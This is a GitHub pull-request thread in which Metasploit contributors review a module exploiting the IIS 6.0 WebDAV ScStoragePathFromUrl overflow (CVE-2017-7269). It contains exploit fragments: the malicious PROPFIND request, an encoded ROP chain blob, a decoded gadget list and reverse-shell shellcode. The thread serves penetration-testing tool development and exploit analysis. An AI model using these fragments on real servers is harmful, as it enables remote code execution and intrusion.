Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add IIS 6.0 ScStoragePathFromUrl exploit (CVE-2017-7269) #8162

Closed
wants to merge 17 commits into from

Conversation

@dmchell
Copy link
Contributor

commented Mar 28, 2017

Exploit for cve-2017-7269

dmchell added some commits Mar 28, 2017

Create cve-2017-7269.rb
Exploit for cve-2017-7269.rb
{
'EXITFUNC' => 'process',
'PrependMigrate' => true,
'PrependMigrateProc' => "calc"

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

Is this actually necessary to specify?

'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', 'CVE-2017-7269'],

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

[ 'CVE', '2017-7269' ], (you don't need the "CVE-" in the second part.

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
},
'Author' => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

In cases where there is an "Original Author" they generally each get their own lines within the module. You can then specify who did what by using comments like:

'Zhiniang Peng',  # original exploit
'Dominic Chell <dominic@mdsec.co.uk>' # metasploit module

This comment has been minimized.

Copy link
@vysecurity

vysecurity Mar 28, 2017

Contributor

Pretty sure it's Zhiniang Peng and Chen Wu, don't forget Mr. Wu


buf1 << payload.encoded

sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

This should really use the HTTP mixin.

This comment has been minimized.

Copy link
@egypt

egypt Mar 28, 2017

Contributor

That might require some testing. Does adding random headers break the determinism of the victim state, for example?

connect

buf1 = "If: <http://localhost/aaaaaaa"
buf1 << "\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac"

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

These should be broken out so we know what these binary blobs are. I'm assuming their the original exploit's ROP chains, and in that case documenting the gadgets in comments would be really helpful.

{
'EXITFUNC' => 'process',
'PrependMigrate' => true,
'PrependMigrateProc' => "calc"

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

Is this really necessary to specify?

Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
},
'Author' => [ 'Dominic Chell <dominic@mdsec.co.uk>' ],

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

Generally when there's an original exploit, those others get credit within the module as well. The normal convention is to then specify each author's roles with comments next to their name.


buf1 << payload.encoded

sock.put("PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n#{buf1}>\r\n\r\n")

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

This should really use the HTTP mixin to make the request.

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

I should have referenced the How to Send an HTTP Request wiki page.

def exploit
connect

buf1 = "If: <http://localhost/aaaaaaa"

This comment has been minimized.

Copy link
@zeroSteiner

zeroSteiner Mar 28, 2017

Contributor

Can these references to http://localhost/... be randomized? Same with the bbbb one below.

@zeroSteiner zeroSteiner added the module label Mar 28, 2017

@cbrnrd

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

@dmchell @zeroSteiner I will be making a PR with a few stylistic changes and improvements

@jamcut

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

This did get me a shell, for what its worth...

cve-2017-7269

@cbrnrd

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

@jamcut It got me a shell as well; however, the module could use some stylistic and functional improvements (which I am working on now).

@jamcut

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

@thecarterb I won't argue that, just commenting on raw usefulness.

@egypt egypt added the feature label Mar 28, 2017

Update iis_webdav_scstoragepathfromurl.rb
converted to Msf::Exploit::Remote::HttpClient
@dmchell

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2017

If you're making stylistic changes then you should grab the latest version as I updated it to use Msf::Exploit::Remote::HttpClient as per the feedback

@cbrnrd

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

@dmchell Just made the PR on your dmchell-cve-2017-7269 branch

@dmchell

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2017

@thecarterb have you tested it? the PR fails to shell.

@egypt

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

Are older versions vulnerable? Doesn't work for me against SP1

@dmchell

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2017

@egypt only tested on SP2 but I'll snapshot and rm the SP and try it

@wwebb-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 28, 2017

I'd caution everyone to avoid potentially gilding the lily and focus on the basics. The biggest hurdle you have from @zeroSteiner 's requests is documenting the ROP chain gadget by gadget. It's undoubtedly going to fail against some far flung release five years from now and someone's going to have to debug it.

@dmchell

This comment has been minimized.

Copy link
Contributor Author

commented Mar 28, 2017

@wwebb-r7 absolutely, I put it to the bottom of the list as it was the most time consuming of the review comments, but it's on the TODO rest assured

@wvu-r7 wvu-r7 added the delayed label Mar 28, 2017

@wvu-r7 wvu-r7 changed the title Create cve-2017-7269.rb Add IIS 6.0 ScStoragePathFromUrl exploit (CVE-2017-7269) Mar 28, 2017

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 8, 2017

@egypt brute forcing the physical path length seems like a requirement since there's no way you'd be able to guess it. In my testing there's no harm in starting at 5 and going up to 40 (or whatever) - it'll work eventually if the server name is right.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 10, 2017

PR coming your way @dmchell

@FireFart

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

@rwhitcroft why are you removing all progress on this module in your PR?

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

How is this not an improvement? What progress did I remove?

@FireFart

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

@rwhitcroft you removed all added options which are essential for this module to work. You also removed the metasploit stub in the beginning, changed references and so on.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

You're right about the stub, not sure what happened there.

You're wrong about the rest though. The PR requires only that you know the VHOST, so it's actually fewer options. Not sure how this is bad thing. Would you rather have to guess?

@FireFart

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

@rwhitcroft:
TARGETURI is necessary if you need to set a sub path, ServerName and ServerPort are necessary if you are behind a reverse proxy as these values can be different from RHOST and RPORT.
You should not remove them, instead implement a get_sane_defaults and set them if the user has not set them explicitly.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

Fair enough! PR closed.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2017

@FireFart Trying again - can you take a look? dmchell#6

It doesn't work without setting VHOST, even if ServerName is correct. I took out the physical path length because you shouldn't need it anymore with the brute force.

@busterb
Copy link
Member

left a comment

As mentioned earlier, the ROP chain still needs to be reverse-engineered here. We should have some documentation for how to do this coming up.

{
'Space' => 2000,
'BadChars' => "\x00",
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,

This comment has been minimized.

Copy link
@busterb

busterb Apr 17, 2017

Member

Do we really need to force the EncoderType here? (side note - it would be good to be able to specify a preference array here)

[
[
'Microsoft Windows Server 2003 R2 SP2',
{

This comment has been minimized.

Copy link
@busterb

busterb Apr 17, 2017

Member

It would be nice to add Arch in addition here.

register_options(
[
OptString.new('TARGETURI', [ true, 'Path of IIS 6 web application', '/']),
OptString.new('ServerName', [ true, 'Servername of the Backend Server', 'localhost' ]),

This comment has been minimized.

Copy link
@busterb

busterb Apr 17, 2017

Member

Can this be converted to VHOST / RPORT instead?

This comment has been minimized.

Copy link
@FireFart

FireFart Apr 17, 2017

Contributor

@busterb actually not. This has to be the server name of the backend server. In a reverse proxy Setup this does not match the vhost. I think the best would be to make this option optional and implement a method to determine the name. If it's not set use vhost, otherwise use the variable. The same goes for Serverport.

'method' => 'OPTIONS'
})
if res && res.headers['Server'].include?('IIS/6.0') && supports_webdav?(res.headers)
return Exploit::CheckCode::Vulnerable

This comment has been minimized.

Copy link
@busterb

busterb Apr 17, 2017

Member

Should this return Appears instead of Vulnerable since it's just checking version instead of exercising the vulnerability?

@egypt

This comment has been minimized.

Copy link
Contributor

commented Apr 24, 2017

I think the thing that's really holding this back is that we have no idea what that big blob of unicode is.

@zcgonvh Do you have documentation for it?

@FireFart

This comment has been minimized.

Copy link
Contributor

commented Apr 24, 2017

@busterb

This comment has been minimized.

Copy link
Member

commented Apr 24, 2017

I used printf on the shellcode and piped through iconv from UTF-8 to UTF-16LE, and it produces plausible shellcode.

$ printf "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" > chars2.txt

$ iconv -f UTF-8 -t UTF-16LE chars2.txt > code2.txt

Shellcode decodes coming soon...

@busterb

This comment has been minimized.

Copy link
Member

commented Apr 24, 2017

The shorter code courtesy of @sinn3r

0040AEC1     77 6A          JA SHORT iexplore.0040AF2D
0040AEC3     44             INC ESP
0040AEC4     41             INC ECX
....

EDIT..shortened since this was a dead end

@busterb

This comment has been minimized.

Copy link
Member

commented Apr 24, 2017

The longer one (this might be alpha2 encoded, also thanks to @sinn3r ):

0040AEBA     56             PUSH ESI
0040AEBB     5A             POP EDX
...

EDIT..shortened since this was a dead end

@zcgonvh

This comment has been minimized.

Copy link

commented Apr 25, 2017

@egypt
its UTF-8 string and will be convert to UTF16-LE.

decoded 1st url (hxxp://test.local:8088/aaaa) contains some paddings(0xc0 bytes? on decoded) and a hard-coded address 0x680312c0 .
decoded 2st url (hxxp://test.local:8088/bbbb) contains paddings(0xb0 bytes? on decoded) ,a fake vtable union from a fake object(with hard-coded address 0x680313c0), and rops,.

on processing,the first memcpy copy 1st url to stack,over written the buffer pointer for 2st url to 0x680312c0.
next memcpy copy 2st url to buffer,over written vtable for IEcb object IEcb object pointer to a fake object 0x680313c0 .
finally,httpext!ScStripAndCheckHttpPrefix+0x1e call function on fake object,and rops run.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented Apr 25, 2017

These look like ROP chains, not raw instructions. Looking at the bottom few lines in @busterb's post directly above, you can see ROP gadgets that reside in rsaenh.dll:

0:019> lm m rsaenh
start    end        module name
68000000 68035000   rsaenh     (pdb symbols)          c:\symbols\rsaenh.pdb\1424801011134E3DADD4748A436CFE1C1\rsaenh.pdb

For instance:

0040AF71     68 E7290168    PUSH 680129E7

If this is treated as a gadget instead of a PUSH, it makes a bit more sense:

0:019> u 680129E7
rsaenh!HmacCheck+0x7c7:
680129e7 c9              leave
680129e8 c3              ret

Another one:

0040AF65     32AA 1D02686A  XOR CH,BYTE PTR DS:[EDX+6A68021D]

is probably actually:

0:019> u 68021daa
rsaenh!IsForceHighProtectionEnabled+0x8:
68021daa 8b8010010000    mov     eax,dword ptr [eax+110h]
68021db0 5d              pop     ebp
68021db1 c20400          ret     4

etc...

@wchen-r7 wchen-r7 self-assigned this Apr 25, 2017

@egypt

This comment has been minimized.

Copy link
Contributor

commented Apr 26, 2017

@busterb The I/O instructions (OUT, OUTS, IN, INS) pretty much always mean that what you have is either not shellcode or decoded incorrectly.

@zcgonvh Thanks for the clarification!

@busterb

This comment has been minimized.

Copy link
Member

commented Apr 26, 2017

Sometimes Cunningham's law is the best approach.

@rwhitcroft

This comment has been minimized.

Copy link
Contributor

commented May 3, 2017

Here's a bit more. I'm definitely not an expert so some of this is probably wrong...

Start with this breakpoint, and run the exploit:
ba r4 680313c0

Hitting g 10 times, should land you at the start of the ROP chain:

68006e4f # POP ESI # POP EBP # RETN 20
68006e4f # POP ESI # POP EBP # RETN 20
6800b113 # PUSH 40h # JMP 6800b125 (40h == PAGE_EXECUTE_READWRITE)
6800b125 # POP EAX # POP EBP # RETN 4
680129e7 # LEAVE # RETN
68006e05 # LEA ESP,[EBP-20h] # POP EDI # POP ESI # POP EBX # LEAVE # RETN 24
68009391 # POP EAX # POP EBP # RETN 4
68021daa # MOV EAX,DWORD PTR [EAX+110h] # POP EBP # RETN 4
680129e7 # LEAVE # RETN
680124e3 # JMP DWORD PTR [EBX] (EBX -> SharedUserData!SystemCallStub)
7c8285e8 # MOV EDX,ESP # SYSENTER # RETN

Gadget 68021daa puts 0x8f into EAX, which is the syscall number for NtProtectVirtualMemory:

0:009> dd eax+110 L1
68008356  0000008f

After SYSENTER, the page is executable:

[+] Information about address 0x68031404
    ascii {PAGE_EXECUTE_READWRITE}

And the final shellcode (rev tcp) here:

rsaenh!g_pfnFree+0x1a4:
68031460 56              push    esi
0:009> du esi
68031460  "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA"
680314a0  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ"
680314e0  "1AIAIAJ11AIAIABABABQI1AIQIAIQI11"
68031520  "1AIAJQYAZBABABABABkMAGB9u4JBiliY"
68031560  "QzYpKPkPQMsS5uLKra94Pp9nKOYoTMR4"
680315a0  "O4c0ob38X1mzRKvQkOIEBma4LdqPxkS0"
680315e0  "1N2mCHc0Og0PNQIKqCr3OxJdKPipZhR3"
68031620  "PSnsNvPSoxt9FloO3VkOZ5CUGPBTr90j"
68031660  "mpE0y7jpr30S01iKPSionWaXtnTGf2OO"
680316a0  "yoVu0T0hpMkQIp9pJKp9pPiop71XI5Fx"
680316e0  "wMjGioXU0S23ns2kPLo4kL0QB323Io07"
68031720  "aX7V6L3j49YohUaZyoaXmtzPnU9PioHU"

I'm not sure about the final jump into the shellcode though.

@wwebb-r7

This comment has been minimized.

Copy link
Contributor

commented May 3, 2017

@rwhitcroft given that the shellcode is going to be stored as unicode, it stands to reason that it's encoded with something like this. I don't have time to test at the moment, but I will later on unless you get to it first.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

@FireFart and I took a look at this PR and we suggest:

  1. The user doesn't need to set the ServerName option. The exploit should automatically send a PROFIND request (with content-legnth as 0), the XML in the response contains the server name and port, and the module can use those automatically.

  2. Let's merge the PR that can brute-force the PhysicalPathLength.

@FireFart

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

I'm currently implementing the changes

@FireFart

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

@dmchell @rwhitcroft We created a follow up PR with the latest changes over here (commits are preserverd):
#8355

@wchen-r7

This comment has been minimized.

Copy link
Contributor

commented May 8, 2017

Hi @dmchell, we will go ahead and continue this PR with #8355. You are still fully credited. Thanks!

@wchen-r7 wchen-r7 closed this May 8, 2017

egypt added a commit that referenced this pull request May 9, 2017

@dmchell

This comment has been minimized.

Copy link
Contributor Author

commented May 9, 2017

@wchen-r7 Sorry guys, my wife spawned (twice) a few weeks ago and it nuked all my R&D time then I lost track of all the comments/requests. I got as far as mostly documenting the ROP chain from rsaenh but it sounds like collectively you've far exceeded this, good work!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.